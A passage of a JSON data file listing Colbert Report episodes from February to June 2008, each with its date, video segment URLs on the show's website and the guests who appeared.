        "http://thecolbertreport.cc.com/videos/r9rjo5/intro---2-13-08",
        "http://thecolbertreport.cc.com/videos/mvp1nc/the-writers-return-",
        "http://thecolbertreport.cc.com/videos/n3dwin/david-gracer",
        "http://thecolbertreport.cc.com/videos/aebxex/neil-de-grasse-tyson",
        "http://thecolbertreport.cc.com/videos/n39iqt/richard-thompson-ford"
      ],
      "guest": "David Gracer, Richard Thompson Ford"
    },
    {
      "date": "2008-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5hf18t/intro---2-14-08",
        "http://thecolbertreport.cc.com/videos/qg63hg/who-s-riding-my-coattails-now----oliver-pocher",
        "http://thecolbertreport.cc.com/videos/slbgcr/clemens-hearing",
        "http://thecolbertreport.cc.com/videos/0i3hg8/john-feinstein",
        "http://thecolbertreport.cc.com/videos/dmxs6z/people-who-are-destroying-america---happy-meal",
        "http://thecolbertreport.cc.com/videos/hxt6mo/leonard-nimoy"
      ],
      "guest": "John Feinstein, Leonard Nimoy"
    },
    {
      "date": "2008-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t6xzxc/intro---2-26-08",
        "http://thecolbertreport.cc.com/videos/cexk3g/obama-s-photo",
        "http://thecolbertreport.cc.com/videos/x6h69l/the-word---good-bad-journalism",
        "http://thecolbertreport.cc.com/videos/4s0owa/henry-louis-gates-jr-"
      ],
      "guest": "Henry Louis Gates Jr."
    },
    {
      "date": "2008-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3uzan2/exclusive---guitar-heroes",
        "http://thecolbertreport.cc.com/videos/spigs3/intro---2-27-08",
        "http://thecolbertreport.cc.com/videos/fb142a/mccain-rally",
        "http://thecolbertreport.cc.com/videos/717g03/threatdown---air-colbert",
        "http://thecolbertreport.cc.com/videos/ni7mzt/tony-snow"
      ],
      "guest": "Tony Snow"
    },
    {
      "date": "2008-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/upjayy/the-music-man",
        "http://thecolbertreport.cc.com/videos/80mnx9/intro---2-28-08",
        "http://thecolbertreport.cc.com/videos/wq9qga/russian-billboard",
        "http://thecolbertreport.cc.com/videos/c64r8o/cold-war-update",
        "http://thecolbertreport.cc.com/videos/zrhp7w/richard-brookhiser",
        "http://thecolbertreport.cc.com/videos/n7g9t0/ingrid-newkirk",
        "http://thecolbertreport.cc.com/videos/zsj0rq/sign-off---shoe-phone"
      ],
      "guest": "Richard Brookhiser, Ingrid Newkirk"
    },
    {
      "date": "2008-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/laopsy/intro---3-3-08",
        "http://thecolbertreport.cc.com/videos/1gyoec/the-coveted-colbert-bump",
        "http://thecolbertreport.cc.com/videos/do24ht/das-booty---hitler-s-gold-pt--1",
        "http://thecolbertreport.cc.com/videos/dvfqt3/maestro-lorin-maazel",
        "http://thecolbertreport.cc.com/videos/8llta1/shashi-tharoor",
        "http://thecolbertreport.cc.com/videos/beqjns/leap-day"
      ],
      "guest": "Lorin Maazel, Shashi Tharoor"
    },
    {
      "date": "2008-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1d4djp/intro---3-4-08",
        "http://thecolbertreport.cc.com/videos/509s01/william-donohue",
        "http://thecolbertreport.cc.com/videos/myyov6/howard-dean",
        "http://thecolbertreport.cc.com/videos/wvt9ny/nailed--em---graffiti-punk",
        "http://thecolbertreport.cc.com/videos/86yukf/jennifer-8--lee",
        "http://thecolbertreport.cc.com/videos/10okbb/to-howard-dean",
        "http://thecolbertreport.cc.com/videos/q08fbb/the-word---experience"
      ],
      "guest": "William Donohue, Howard Dean, Jennifer 8. Lee"
    },
    {
      "date": "2008-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9o2e4d/intro---3-5-08",
        "http://thecolbertreport.cc.com/videos/d60bre/farewell-brett-favre",
        "http://thecolbertreport.cc.com/videos/q038rv/hucka-bye",
        "http://thecolbertreport.cc.com/videos/6296yb/robert-reich",
        "http://thecolbertreport.cc.com/videos/lrlzri/difference-makers---free-implants",
        "http://thecolbertreport.cc.com/videos/z6yixf/gregory-rodriguez",
        "http://thecolbertreport.cc.com/videos/p6i1w8/r-i-p--gary-gygax"
      ],
      "guest": "Robert Reich, Gregory Rodriguez"
    },
    {
      "date": "2008-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zoimd4/intro---3-6-08",
        "http://thecolbertreport.cc.com/videos/m9ob1y/hot-dog-with-the-president",
        "http://thecolbertreport.cc.com/videos/i9idne/the-word---at---treason",
        "http://thecolbertreport.cc.com/videos/0ih0ea/cheating-death---surgery",
        "http://thecolbertreport.cc.com/videos/cv6bwa/john-legend"
      ],
      "guest": "John Legend"
    },
    {
      "date": "2008-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mahtb2/intro---3-10-08",
        "http://thecolbertreport.cc.com/videos/3a9bum/whores-",
        "http://thecolbertreport.cc.com/videos/8p3t8b/the-word---size-matters",
        "http://thecolbertreport.cc.com/videos/fdo5yd/the--72-democrats",
        "http://thecolbertreport.cc.com/videos/7m46n6/george-mcgovern"
      ],
      "guest": "George McGovern"
    },
    {
      "date": "2008-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ybl08/intro---3-11-08",
        "http://thecolbertreport.cc.com/videos/me89dy/spitzer-greeting-cards",
        "http://thecolbertreport.cc.com/videos/twuo43/the-word---mr--right-now",
        "http://thecolbertreport.cc.com/videos/f7ltv5/colbert-platinum---liechtenstein",
        "http://thecolbertreport.cc.com/videos/gcwzrr/geraldo-rivera",
        "http://thecolbertreport.cc.com/videos/8h6jvx/sign-off---show-s-over--america"
      ],
      "guest": "Geraldo Rivera"
    },
    {
      "date": "2008-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tvzv05/intro---3-12-08",
        "http://thecolbertreport.cc.com/videos/ntzxtt/spitzer-sandwich",
        "http://thecolbertreport.cc.com/videos/ippftn/smokin--pole---alaska",
        "http://thecolbertreport.cc.com/videos/50a47x/better-know-a-lobby---drug-policy-alliance",
        "http://thecolbertreport.cc.com/videos/nouiem/howard-kurtz"
      ],
      "guest": "Howard Kurtz"
    },
    {
      "date": "2008-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gpd5cu/intro---3-13-08",
        "http://thecolbertreport.cc.com/videos/k8bsjv/airborne-lawsuit",
        "http://thecolbertreport.cc.com/videos/d51tqz/democralypse-now---ferraro",
        "http://thecolbertreport.cc.com/videos/tvjvip/hussein-ibish",
        "http://thecolbertreport.cc.com/videos/oe7yd2/difference-makers---doug-jackson",
        "http://thecolbertreport.cc.com/videos/mzut29/sudhir-venkatesh"
      ],
      "guest": "Hussein Ibish, Sudhir Venkatesh"
    },
    {
      "date": "2008-03-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ck2j7u/exclusive---spitzer",
        "http://thecolbertreport.cc.com/videos/8zfc9q/intro---3-17-08",
        "http://thecolbertreport.cc.com/videos/v28dea/stephen-in-philly",
        "http://thecolbertreport.cc.com/videos/rxdrv8/the-word---the-audacity-of-hopelessness",
        "http://thecolbertreport.cc.com/videos/tw4jo4/people-who-are-destroying-america---st--patrick-s-day",
        "http://thecolbertreport.cc.com/videos/5j8sg4/samantha-power"
      ],
      "guest": "Samantha Power"
    },
    {
      "date": "2008-03-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vgwiie/intro---3-18-08",
        "http://thecolbertreport.cc.com/videos/wsz08m/yes-we-can-",
        "http://thecolbertreport.cc.com/videos/xtwx8p/spicy-sweet-coverage",
        "http://thecolbertreport.cc.com/videos/mogf73/das-booty---hitler-s-gold-pt--2",
        "http://thecolbertreport.cc.com/videos/5boih5/carole-king"
      ],
      "guest": "Carole King"
    },
    {
      "date": "2008-03-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hcafrk/intro---3-19-08",
        "http://thecolbertreport.cc.com/videos/hrjm1z/patterson-affair",
        "http://thecolbertreport.cc.com/videos/scqdwy/the-word---the-gospel-of-john",
        "http://thecolbertreport.cc.com/videos/y6aybj/pennsylvania-primary",
        "http://thecolbertreport.cc.com/videos/037ygf/tip-wag---afghanistan",
        "http://thecolbertreport.cc.com/videos/vk922m/dee-dee-myers"
      ],
      "guest": "Dee Dee Myers"
    },
    {
      "date": "2008-03-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vq76dq/watershift-down--getting-the-sea-monkey-off-america-s-aqua-back",
        "http://thecolbertreport.cc.com/videos/wkdrt1/aqua-colbert",
        "http://thecolbertreport.cc.com/videos/l1sl1c/water-is-life",
        "http://thecolbertreport.cc.com/videos/3mtvfm/dean-kamen",
        "http://thecolbertreport.cc.com/videos/4y9sds/setting-water-on-fire"
      ],
      "guest": "Dean Kamen"
    },
    {
      "date": "2008-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f3rbbv/intro---3-31-08",
        "http://thecolbertreport.cc.com/videos/aqkiox/opening-day",
        "http://thecolbertreport.cc.com/videos/0fo1qd/bowling-in-pa",
        "http://thecolbertreport.cc.com/videos/2ii77j/eric-alterman",
        "http://thecolbertreport.cc.com/videos/b149k1/tek-jansen---beginning-s-first-dawn--episode-one-revisited",
        "http://thecolbertreport.cc.com/videos/3p6caw/michael-reynolds"
      ],
      "guest": "Eric Alterman, Michael Reynolds"
    },
    {
      "date": "2008-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ayieu5/intro---4-1-08",
        "http://thecolbertreport.cc.com/videos/irlo9m/portrait-update",
        "http://thecolbertreport.cc.com/videos/inwuqm/the-word---pick-sicks",
        "http://thecolbertreport.cc.com/videos/fpyy9k/bears---balls---rat-rakes",
        "http://thecolbertreport.cc.com/videos/700kdb/van-jones",
        "http://thecolbertreport.cc.com/videos/lrepiq/portrait-displayed"
      ],
      "guest": "Van Jones"
    },
    {
      "date": "2008-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/46s8py/intro---4-2-08",
        "http://thecolbertreport.cc.com/videos/sbidx5/stephen-wins-a-peabody",
        "http://thecolbertreport.cc.com/videos/3fc86e/threatdown---nipples",
        "http://thecolbertreport.cc.com/videos/n3f5qh/r-e-m-"
      ],
      "guest": "R.E.M."
    },
    {
      "date": "2008-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aj43z8/intro---4-3-08",
        "http://thecolbertreport.cc.com/videos/tyapiy/peabody-credit",
        "http://thecolbertreport.cc.com/videos/xwlefp/the-word---let-the-games-begin",
        "http://thecolbertreport.cc.com/videos/gx1oov/tek-jansen---beginning-s-first-dawn--episode-two",
        "http://thecolbertreport.cc.com/videos/dm9a7h/clay-shirky",
        "http://thecolbertreport.cc.com/videos/jsqez9/tek-jansen---you-are-the-best"
      ],
      "guest": "Clay Shirky"
    },
    {
      "date": "2008-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7lye0f/intro---4-7-08",
        "http://thecolbertreport.cc.com/videos/we6e20/r-i-p--charlton-heston",
        "http://thecolbertreport.cc.com/videos/xh2gv1/trevor-paglen",
        "http://thecolbertreport.cc.com/videos/3xlgs3/democralypse-now---3am",
        "http://thecolbertreport.cc.com/videos/82gipv/jesse-ventura"
      ],
      "guest": "Trevor Paglen, Jesse Ventura"
    },
    {
      "date": "2008-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/54jfl6/intro---4-8-08",
        "http://thecolbertreport.cc.com/videos/yme30m/pope-coming-to-nyc",
        "http://thecolbertreport.cc.com/videos/g0ke6u/children-s-drawings",
        "http://thecolbertreport.cc.com/videos/0dimmt/wilford-brimley-calls---donation",
        "http://thecolbertreport.cc.com/videos/elawer/madeleine-albright"
      ],
      "guest": "Madeleine Albright"
    },
    {
      "date": "2008-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bdme3x/intro---4-9-08",
        "http://thecolbertreport.cc.com/videos/iekisu/olympic-torch",
        "http://thecolbertreport.cc.com/videos/ypse7c/the-word---starter-country",
        "http://thecolbertreport.cc.com/videos/jycq7p/cheating-death---sexual-health",
        "http://thecolbertreport.cc.com/videos/nlvpn4/jeff-gore"
      ],
      "guest": "Jeff Gore"
    },
    {
      "date": "2008-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zsmonm/intro---4-10-08",
        "http://thecolbertreport.cc.com/videos/6sdfwa/petraeus-hearings",
        "http://thecolbertreport.cc.com/videos/x8pxwi/more-drawings-from-kids",
        "http://thecolbertreport.cc.com/videos/z2z65o/the-word---black-and-white",
        "http://thecolbertreport.cc.com/videos/v1k50e/tip-wag---rain",
        "http://thecolbertreport.cc.com/videos/torkh7/robin-wright"
      ],
      "guest": "Robin Wright"
    },
    {
      "date": "2008-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qfrdo9/from-philadelphia",
        "http://thecolbertreport.cc.com/videos/5phute/pennsylvania-primary-history",
        "http://thecolbertreport.cc.com/videos/1b60fj/chris-matthews"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2008-04-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oj9blc/intro---4-15-08",
        "http://thecolbertreport.cc.com/videos/3aqwqx/nice-roomba",
        "http://thecolbertreport.cc.com/videos/ad5qga/the-word---tradition",
        "http://thecolbertreport.cc.com/videos/7unrts/independence-park",
        "http://thecolbertreport.cc.com/videos/upl7xe/michelle-obama"
      ],
      "guest": "Michelle Obama, The Roots"
    },
    {
      "date": "2008-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h0lfw9/intro---4-16-08",
        "http://thecolbertreport.cc.com/videos/pi51oz/jackie-o--amendment",
        "http://thecolbertreport.cc.com/videos/9z3000/democralypse-now---the-boss",
        "http://thecolbertreport.cc.com/videos/9zm7cy/national-constitution-center",
        "http://thecolbertreport.cc.com/videos/51r39w/ed-rendell",
        "http://thecolbertreport.cc.com/videos/1bzrgk/benjamin-franklin-s-news"
      ],
      "guest": "Philadelphia Eagles Cheerleaders, Gov. Ed Rendell"
    },
    {
      "date": "2008-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ky7oxg/benjamin-franklin-s-latest-invention",
        "http://thecolbertreport.cc.com/videos/uzusr0/hillary-clinton-takes-on-technical-difficulties",
        "http://thecolbertreport.cc.com/videos/1i62sd/clinton-vs--obama-philadelphia-debate-review",
        "http://thecolbertreport.cc.com/videos/ew5t9y/patrick-murphy",
        "http://thecolbertreport.cc.com/videos/x3zme5/the-ed-words---valued-voter",
        "http://thecolbertreport.cc.com/videos/ol0nn3/on-notice---barack-obama-against-distractions"
      ],
      "guest": "Hillary Clinton, John Edwards, Barack Obama"
    },
    {
      "date": "2008-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i6ihlp/intro---4-21-08",
        "http://thecolbertreport.cc.com/videos/foffke/philly-loves-colbert-nation",
        "http://thecolbertreport.cc.com/videos/5jm58y/global-food-shortage",
        "http://thecolbertreport.cc.com/videos/ehgxth/father-james-martin",
        "http://thecolbertreport.cc.com/videos/oo6wpp/bernie-sanders",
        "http://thecolbertreport.cc.com/videos/e7gpah/farewell-to-bobby"
      ],
      "guest": "Fr. James Martin, Sen. Bernie Sanders"
    },
    {
      "date": "2008-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ah79bq/intro---4-22-08",
        "http://thecolbertreport.cc.com/videos/tp640v/earth-is-awesome",
        "http://thecolbertreport.cc.com/videos/uyxyc7/obama-copycattery",
        "http://thecolbertreport.cc.com/videos/a2ha6c/indecision-cheesesteaks",
        "http://thecolbertreport.cc.com/videos/0nsiap/better-know-a-district---pennsylvania-s-7th---joe-sestak",
        "http://thecolbertreport.cc.com/videos/5427ng/susan-jacoby",
        "http://thecolbertreport.cc.com/videos/l34czb/exclusive---better-know-a-district---pennsylvania-s-7th---joe-sestak"
      ],
      "guest": "Susan Jacoby"
    },
    {
      "date": "2008-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lxpsri/intro---4-23-08",
        "http://thecolbertreport.cc.com/videos/6wperh/rain-rivalry-challenge",
        "http://thecolbertreport.cc.com/videos/hpr26d/the-word---iraq-the-vote",
        "http://thecolbertreport.cc.com/videos/fqo64s/colbert-platinum---cat-pooped-coffee",
        "http://thecolbertreport.cc.com/videos/5azl7m/mitch-albom",
        "http://thecolbertreport.cc.com/videos/qdf6zq/the-lost-o-reilly-tapes-pt--1"
      ],
      "guest": "Mitch Albom"
    },
    {
      "date": "2008-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6kux9r/intro---4-24-08",
        "http://thecolbertreport.cc.com/videos/a1qle2/petraeus--promotion",
        "http://thecolbertreport.cc.com/videos/uddwea/threatdown---juicing-bulls",
        "http://thecolbertreport.cc.com/videos/e3l9yt/difference-makers---bumbot",
        "http://thecolbertreport.cc.com/videos/lr9uai/maria-shriver"
      ],
      "guest": "Maria Shriver"
    },
    {
      "date": "2008-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3fwic4/intro---4-28-08",
        "http://thecolbertreport.cc.com/videos/244o0l/miley-cyrus-photo-shoot",
        "http://thecolbertreport.cc.com/videos/9v4qwg/electability",
        "http://thecolbertreport.cc.com/videos/ejbmnx/the-word---kernel-of-truth",
        "http://thecolbertreport.cc.com/videos/3osshb/sport-report---timbersports",
        "http://thecolbertreport.cc.com/videos/222rjo/feist"
      ],
      "guest": "Feist"
    },
    {
      "date": "2008-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a1muh6/intro---4-29-08",
        "http://thecolbertreport.cc.com/videos/vc3sa7/obama-breaks-with-wright",
        "http://thecolbertreport.cc.com/videos/uk74h6/mccain-s-superstitions",
        "http://thecolbertreport.cc.com/videos/ry65tk/the-word---separation-of-church---plate",
        "http://thecolbertreport.cc.com/videos/cy9dmw/tip-wag---barbie",
        "http://thecolbertreport.cc.com/videos/s3buaq/anne-lamott"
      ],
      "guest": "Anne Lamott"
    },
    {
      "date": "2008-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/byoxj1/intro---4-30-08",
        "http://thecolbertreport.cc.com/videos/xju86c/salinger-watch",
        "http://thecolbertreport.cc.com/videos/1rdkem/donna-brazile-on-the-democratic-campaign",
        "http://thecolbertreport.cc.com/videos/4ngs9u/better-know-a-protectorate---guam---madeleine-bordallo-update",
        "http://thecolbertreport.cc.com/videos/vjk2cd/noah-feldman"
      ],
      "guest": "Donna Brazile, Noah Feldman"
    },
    {
      "date": "2008-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zd3gn/intro---5-01-08",
        "http://thecolbertreport.cc.com/videos/clfbo3/jenna-bush-wedding",
        "http://thecolbertreport.cc.com/videos/sctmlw/trailers-destroying-america---summer-movie-edition",
        "http://thecolbertreport.cc.com/videos/aka0f3/formidable-opponent---electability",
        "http://thecolbertreport.cc.com/videos/zck6ux/james-howard-kunstler"
      ],
      "guest": "James Kunstler"
    },
    {
      "date": "2008-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nhsr7z/intro---5-05-08",
        "http://thecolbertreport.cc.com/videos/wtbn4l/time-s-2008-top-100-most-influential",
        "http://thecolbertreport.cc.com/videos/x20ttg/the-word---free-gas-",
        "http://thecolbertreport.cc.com/videos/oov14y/speed-racer",
        "http://thecolbertreport.cc.com/videos/91hddq/alpha-dog-of-the-week---911-operator",
        "http://thecolbertreport.cc.com/videos/2uj60r/carl-hiaasen",
        "http://thecolbertreport.cc.com/videos/k44vbf/rain-dance-off"
      ],
      "guest": "Carl Hiaasen"
    },
    {
      "date": "2008-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e38w0k/intro---5-06-08",
        "http://thecolbertreport.cc.com/videos/e3fb1q/sexy-voice-study",
        "http://thecolbertreport.cc.com/videos/qy6hoq/the-word---collateral-friendage",
        "http://thecolbertreport.cc.com/videos/byyq8n/stephen-s-sound-advice---karl-s-advice",
        "http://thecolbertreport.cc.com/videos/y777b4/nathan-gunn"
      ],
      "guest": "Nathan Gunn"
    },
    {
      "date": "2008-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fk83lx/intro---5-07-08",
        "http://thecolbertreport.cc.com/videos/20qjta/stephen-colbert-s-shockettes",
        "http://thecolbertreport.cc.com/videos/su4v1v/terrorist-nelson-mandela",
        "http://thecolbertreport.cc.com/videos/07p71k/hasan-elahi",
        "http://thecolbertreport.cc.com/videos/bc4u9e/democralypse-now---justin-myers",
        "http://thecolbertreport.cc.com/videos/av0o9p/george-johnson"
      ],
      "guest": "Hasan Elahi, George Johnson"
    },
    {
      "date": "2008-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ey98z2/exclusive---stephen-vs--rain",
        "http://thecolbertreport.cc.com/videos/6wn8i5/garrett-reisman",
        "http://thecolbertreport.cc.com/videos/qnk6x8/gas-dollar",
        "http://thecolbertreport.cc.com/videos/txq3hp/arianna-huffington",
        "http://thecolbertreport.cc.com/videos/uafvva/r-i-p--albert-hoffman"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2008-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/da4u0g/intro---5-12-08",
        "http://thecolbertreport.cc.com/videos/tj7sih/big-russ",
        "http://thecolbertreport.cc.com/videos/kdeptj/cold-war-update---russia",
        "http://thecolbertreport.cc.com/videos/k7k3ke/threatdown---cute-bears",
        "http://thecolbertreport.cc.com/videos/3i279j/dr--mehmet-oz"
      ],
      "guest": "Dr. Mehmet Oz"
    },
    {
      "date": "2008-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oycul0/exclusive---better-know-a-lobby---brady-campaign-to-prevent-gun-violence",
        "http://thecolbertreport.cc.com/videos/1siped/intro---5-13-08",
        "http://thecolbertreport.cc.com/videos/mpq03a/hillary-drop-out",
        "http://thecolbertreport.cc.com/videos/qxr59r/bill-o-reilly-inside-edition",
        "http://thecolbertreport.cc.com/videos/np2mes/better-know-a-lobby---brady-campaign-to-prevent-gun-violence",
        "http://thecolbertreport.cc.com/videos/24b8xh/jennifer-hooper-mccarty"
      ],
      "guest": "Jennifer Hooper McCarty"
    },
    {
      "date": "2008-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/suewpq/intro---5-14-08",
        "http://thecolbertreport.cc.com/videos/fygt2g/edwards-supports-obama",
        "http://thecolbertreport.cc.com/videos/ry9ff3/who-s-not-honoring-me-now----science",
        "http://thecolbertreport.cc.com/videos/xnkjrq/the-word---declaration-of-warming",
        "http://thecolbertreport.cc.com/videos/gxghyw/laura-dern",
        "http://thecolbertreport.cc.com/videos/4tldfc/grover-norquist",
        "http://thecolbertreport.cc.com/videos/zujfq0/the-show-comes-to-an-end"
      ],
      "guest": "Laura Dern, Grover Norquist"
    },
    {
      "date": "2008-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nkmoxa/intro---5-15-08",
        "http://thecolbertreport.cc.com/videos/ekfqs4/american-craft-beer-week",
        "http://thecolbertreport.cc.com/videos/wy0c00/edwards-endorses-obama",
        "http://thecolbertreport.cc.com/videos/scm34l/the-word---jail-sweet-jail",
        "http://thecolbertreport.cc.com/videos/ak0o7t/bears---balls---dollar-stores",
        "http://thecolbertreport.cc.com/videos/rarvxz/andrei-cherny"
      ],
      "guest": "Andrei Cherny"
    },
    {
      "date": "2008-05-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v79z0o/intro---5-27-08",
        "http://thecolbertreport.cc.com/videos/k0kiom/fleet-week",
        "http://thecolbertreport.cc.com/videos/xuhumb/mccain-s-preachers",
        "http://thecolbertreport.cc.com/videos/dxmleo/tony-perkins",
        "http://thecolbertreport.cc.com/videos/o5c67w/brian-greene"
      ],
      "guest": "Tony Perkins, Brian Greene"
    },
    {
      "date": "2008-05-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tuxwuw/intro---5-28-08",
        "http://thecolbertreport.cc.com/videos/euhkkf/microbe-beat-",
        "http://thecolbertreport.cc.com/videos/z1nl4c/the-word---brushback-pitch",
        "http://thecolbertreport.cc.com/videos/jhmlmk/cheating-death---liquid-launch",
        "http://thecolbertreport.cc.com/videos/ngaz1d/claire-mccaskill"
      ],
      "guest": "Sen. Claire McCaskill"
    },
    {
      "date": "2008-05-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6wfa6q/intro---5-29-08",
        "http://thecolbertreport.cc.com/videos/79u1cf/shout-out----broken-space-toilet",
        "http://thecolbertreport.cc.com/videos/6735i1/democralypse-now---florida-and-michigan",
        "http://thecolbertreport.cc.com/videos/ug78n1/tad-devine",
        "http://thecolbertreport.cc.com/videos/lhma93/tip-wag---monetary-discrimination",
        "http://thecolbertreport.cc.com/videos/3qprbm/david-sirota",
        "http://thecolbertreport.cc.com/videos/g0kftc/sneak-preview"
      ],
      "guest": "Tad Devine, David Sirota"
    },
    {
      "date": "2008-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hrlfp0/intro---6-02-08",
        "http://thecolbertreport.cc.com/videos/dvmsby/obama-s-church",
        "http://thecolbertreport.cc.com/videos/38jpc2/fire-at-universal",
        "http://thecolbertreport.cc.com/videos/jlvsj6/the-word---media-culpa",
        "http://thecolbertreport.cc.com/videos/8cygn0/colbert-platinum---private-jets",
        "http://thecolbertreport.cc.com/videos/p0u6f8/jon-paskowitz",
        "http://thecolbertreport.cc.com/videos/piym7c/final-thought"
      ],
      "guest": "Jon Paskowitz"
    },
    {
      "date": "2008-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4vr7xb/intro---6-03-08",
        "http://thecolbertreport.cc.com/videos/o005k6/democratic-primaries-over",
        "http://thecolbertreport.cc.com/videos/viwun3/the-word---unhealthy-competition",
        "http://thecolbertreport.cc.com/videos/po30h9/stephen-s-sound-advice---summer-jobs",
        "http://thecolbertreport.cc.com/videos/xhigi4/george-will"
      ],
      "guest": "George Will"
    },
    {
      "date": "2008-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0w2khv/intro---6-04-08",
        "http://thecolbertreport.cc.com/videos/hfq15q/john-mccain-s-green-screen-challenge",
        "http://thecolbertreport.cc.com/videos/wsbc0i/libertarian-party---bob-barr",
        "http://thecolbertreport.cc.com/videos/sn90ui/salman-rushdie",
        "http://thecolbertreport.cc.com/videos/uji4o5/the-lost-o-reilly-tapes-pt--2"
      ],
      "guest": "Rep. Bob Barr, Salman Rushdie"
    },
    {
      "date": "2008-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yv02dd/intro---6-05-08",
        "http://thecolbertreport.cc.com/videos/n90wjr/the-andromeda-strain",
        "http://thecolbertreport.cc.com/videos/ugt12v/the-word---oh--the-places-you-ll-stay",
        "http://thecolbertreport.cc.com/videos/6nrkel/sport-report---mike-forrester",
        "http://thecolbertreport.cc.com/videos/ibt0j9/pat-buchanan"
      ],
      "guest": "Pat Buchanan"
    },
    {
      "date": "2008-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qowh4f/intro---6-09-08",
        "http://thecolbertreport.cc.com/videos/icuy8o/democralypse-now---hillary-concedes",
        "http://thecolbertreport.cc.com/videos/numnri/the-word---if-at-first-you-don-t-secede",
        "http://thecolbertreport.cc.com/videos/vlab0d/threatdown---secret-negro-presidents",
        "http://thecolbertreport.cc.com/videos/gv27al/philip-weiss"
      ],
      "guest": "Phil Weiss"
    },
    {
      "date": "2008-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/705tqw/intro---6-10-08",
        "http://thecolbertreport.cc.com/videos/cbjixz/new-giant-iphone",
        "http://thecolbertreport.cc.com/videos/w5you4/tickling-the-rocks",
        "http://thecolbertreport.cc.com/videos/skw5sl/the-elitist-menace-among-us",
        "http://thecolbertreport.cc.com/videos/qhpj5f/smokin--pole---canada-s-hockey-theme",
        "http://thecolbertreport.cc.com/videos/9bdggo/alan-rabinowitz"
      ],
      "guest": "Alan Rabinowitz"
    },
    {
      "date": "2008-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/373j1n/intro---6-11-08",
        "http://thecolbertreport.cc.com/videos/gbgmuk/israel-s-new-bird",
        "http://thecolbertreport.cc.com/videos/twddgu/the-word---u-s--airweighs",
        "http://thecolbertreport.cc.com/videos/pp8c40/un-american-news---u-s--election-edition",
        "http://thecolbertreport.cc.com/videos/zudzs0/david-hajdu",
        "http://thecolbertreport.cc.com/videos/idly59/memorized-script"
      ],
      "guest": "David Hajdu"
    },
    {
      "date": "2008-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mpfrre/intro---6-12-08",
        "http://thecolbertreport.cc.com/videos/nsgvgc/stephen-colbert-s-make-mccain-exciting-challenge-",
        "http://thecolbertreport.cc.com/videos/86su5q/winona-laduke",
        "http://thecolbertreport.cc.com/videos/qrbimj/we-the-mediator",
        "http://thecolbertreport.cc.com/videos/t6nh85/dickson-despommier"
      ],
      "guest": "Winona LaDuke, Dixon Despommier"
    },
    {
      "date": "2008-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vnwwom/intro---6-16-08",
        "http://thecolbertreport.cc.com/videos/6vk2ye/tim-russert-tribute",
        "http://thecolbertreport.cc.com/videos/mpqoje/the-word---ploy-cott",
        "http://thecolbertreport.cc.com/videos/cqvvlk/the-enemy-within---wizard-teachers",
        "http://thecolbertreport.cc.com/videos/8xg385/kenneth-miller"
      ],
      "guest": "Kenneth R. Miller"
    },
    {
      "date": "2008-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jfofbj/intro---6-17-08",
        "http://thecolbertreport.cc.com/videos/kwlu8o/peabody-award",
        "http://thecolbertreport.cc.com/videos/tapfcu/neal-katyal",
        "http://thecolbertreport.cc.com/videos/fuhy6f/sport-report---timbersports-championship",
        "http://thecolbertreport.cc.com/videos/vcz3hv/jonathan-zittrain",
